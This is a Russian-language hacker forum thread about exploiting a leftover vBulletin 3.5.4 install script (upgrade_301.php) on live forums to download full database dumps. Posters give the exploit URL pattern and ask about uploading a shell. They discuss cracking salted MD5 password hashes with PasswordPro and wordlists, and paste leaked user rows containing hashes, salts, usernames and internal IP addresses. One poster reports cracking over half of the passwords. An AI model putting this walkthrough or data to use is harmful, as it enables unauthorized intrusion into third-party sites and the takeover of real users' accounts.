vBulletin 3.5.* вопрос про upgrade_301.php

Короче, нашел форум где стоит булка версии 3.5.4.
Админ когда форум ставил не почитстил install.
Т.е. пример: http://target.ru/forum/install/upgrade_301.php?step=SomeWord
Заходишь значит на критическое обнавление и мона скачать там базы sql. Вот меня интересует, может там можно не только скачивать а и залить ну шелл например =) Кстати на счёт таких ответов типа "качай users.sql там будут хэшники и декодируй и с помощю проги passwordpro" таких ответов не надо. По существу пожалуйста...

 

а ссылку форума можешь дать???

 

******* закрыл ссылку
Sorry не знал что ссылки выкладывать нельзя...
------
qBiN

 

Там же нету функций на восстановление бд, имхо нельзя.

Чем не нравиться вариант с хэшем и солью? Обленился народ, шелл им сразу подавай.

 

Долго это брутом заниматся... =(
Темболее у админа какой нибудь пароль из 8-10 символов. Причём Верхний регистр и нижний +символы. И попробуй подобрать пасс =) У меня PasswordPro пишет что осталось всего лишь 10867 дней =) Проще будет XXSку тогда найти =)

 

Не знаю я всегда с лёгксоть брутил хэши мд5+соль.

 

С легкостью брутил хэши с солью 10 символов верхний+нижний+коды? Силен однако.

 

Да вы норкоман! Вы вообще ни в чем не розбераетесь!

 

ну вон же четвёртый с конца :
nameass:salt
test:88daac6bba8e542226b399d6fd6d5034:+P[
driver:cf95d7cc88708edb51abda56c5e73877:BqT
taranvv:bdf68936f076f2f440615cc60e4cbbaa:xk|
ruslan11:9a67b99a6b7e698531e260a655317dc0:SE\\

 

смотри названия колонок

Соль - 3 символа, + позицию даже можешь ручками пересчитать)

 

Я понял, спасибо.
PasswordPro и вперёд.
Один только вопрос - где можно качнуть нормальный словарь для перебора?

 

https://forum.antichat.ru/thread13640.html

 

При заходе на http://site/forum/install/upgrade_301.php?step=hello

Пишет
Please Enter Your Customer Number
//поле для ввода
This is the number with which you log in to the vBulletin.com Members' Area

Где можно узнать этот номер? Или дайте пару валидных примеров номеров или генератор plz

 

Пробуй так

Пробуй ссылку http://target.com/forum_path/install/upgrade_301.php?step=SomeWord
У меня все получилось

 

Дык я то же самое делал. Только вместо someword я фтыкал hello

 

Такая надпись появляется, если форум лицензионный. Нужно вводить регистрационный код форума. Когда форум зануленный, такой надписи нет.

 

в Vbulletin 3.5.4 воспользовался багой upgrade_301.php, снял дамп всех баз данных форума...Там было зарегино окола 60 юзеров.. я расшифровал больше половины паролей.. но затем наткнулся на следущие строчки в базе...

HTML:

INSERT INTO user VALUES('35','2','','0','vasya','46ba51cfaa62730ff639deeb40cf9307','2006-09-19','[email protected]','0','','','','','','','','1','0','Новичок','0','1158679407','0','1159311941','1159828322','1159828309','1','10','5','2','1','0','0','0','3783','','0000-00-00','-1','1','10.10.2.16','0','0','0','0','-1','0','0','\'aD');
INSERT INTO user VALUES('67','2','','0','jon','151b39dbb6ec6bce57b7913dbac76e62','2006-10-03','[email protected]','0','','','','','','','','1','0','Новичок','0','1159848049','0','1159848049','1159848255','0','0','10','5','2','1','0','0','0','3143','','0000-00-00','-1','-1','10.10.2.99','0','1','0','0','-1','0','0','\">#');
INSERT INTO user VALUES('63','2','','0','Marina','c19808794095218b7e8e61b99cd02c3a','2006-10-02','[email protected]','0','','','','','','','','1','0','Новичок','0','1159816716','0','1159816716','1159817189','0','0','10','5','2','1','0','0','0','3271','','0000-00-00','-1','-1','10.10.8.67','0','1','0','0','-1','0','0','\\LM');
INSERT INTO user VALUES('26','2','','0','dimom','346a5ee3fb557b5dc4a2b1f1866f3c7b','2006-09-18','[email protected]','0','','','','','','','','1','0','Новичок','0','1158603259','0','1158603687','1159811676','0','0','10','5','2','1','0','0','0','3271','','0000-00-00','-1','-1','10.10.3.33','0','1','0','0','-1','0','0',')*V');

у юзера vasya стоит '\'aD', вот тут я и непонял, соль в Vbulletin 3.5.4 вроде состоит из 3 символов: salt char(3) NOT NULL... и у остальных трёх юзеров соль состоит из 4 символов.. ..подскажите кто может в 4 строчках - где тут соль...

 

Так это и есть 3 символа. \ - это экранирующий слэш.

 

И какая тогда будет соль например тут '\'aD'?

 

Символ "\" добавляется для того чтобы следующий за ним символ не мог нарушить работу скрипта. Символ ' это может. Поэтому там слэш. Если бы было иначе - скрипт бы обрабатывался так: salt '\'

Отмодерьте кто нить пост https://forum.antichat.ru/showpost.php?p=192363&postcount=9
а то топик на 5км по горизонтали прокручивать приходиться.